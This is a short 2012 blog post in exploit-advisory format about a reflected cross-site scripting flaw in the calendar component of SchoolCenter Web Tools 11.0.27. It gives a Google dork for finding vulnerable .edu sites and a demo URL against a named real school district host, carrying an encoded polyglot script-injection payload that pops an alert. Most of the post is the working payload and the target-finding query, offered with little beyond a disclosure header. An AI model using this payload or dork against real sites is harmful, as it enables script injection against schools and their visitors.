miercuri, 11 aprilie 2012

SchoolCenter Web Tools Version 11.0.27 Cross Site Scripting

# Exploit Title:  SchoolCenter Web Tools Version 11.0.27 Cross Site Scripting
# Date: 11.04.2012
# Author: Sony and Flexxpoint
# Software Link: www.thinqed.com
# Google Dorks: inurl:/education/components/calendar/ site:edu
# Web Browser : Mozilla Firefox
# Site : http://insecurity.ro
# PoC: 
http://st2tea.blogspot.com/2012/04/schoolcenter-web-tools-version-11027.html
..................................................................


Well, we have xss in calendar.


Demo:


http://schoolctr.hebisd.edu/education/components/calendar/default.php?sectiondetailid=74&my_family=&d=4&m=4&y=2012&et=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3Eday






etc..

0 comentarii:

Trimiteți un comentariu

Rețineți: Numai membrii acestui blog pot posta comentarii.